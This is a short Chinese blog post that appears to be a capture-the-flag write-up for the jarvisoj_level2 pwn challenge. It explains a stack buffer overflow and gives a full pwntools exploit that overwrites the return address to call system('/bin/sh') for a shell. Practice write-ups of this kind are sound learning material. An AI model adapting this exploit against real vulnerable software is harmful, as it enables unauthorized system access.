BUUCT_PWN8 jarvisoj_level2

jarvisoj_level2

查看保护措施:

image.png

canary没有,很好。
栈可执行,这题也可以在栈上写shellcode。
PIE都没开,从IDA看到的地址就是实际加载的地址了。

IDA 静态分析

image.png

vulnerable_function 里面 read 读了 0x100 字节,但是 buf 只有 0x88 字节,缓冲区溢出。

那么思路很简单
image.png

ida 找 '/bin/sh'

image.png

system肯定是有了,可以从符号表中取出地址

image.png

exp:

from pwn import *

r = process("./level2")
elf = ELF("./level2")

sys_addr = elf.symbols['system']
bin_sh_addr = 0x0804A024

payload = b'A'*(0x88+4)
payload += p32(sys_addr)
payload += b'AAAA'
payload += p32(bin_sh_addr)

r.sendline(payload)
r.interactive()

image.png

posted @ 2023-11-29 11:28  toso  阅读(21)  评论(0编辑  收藏  举报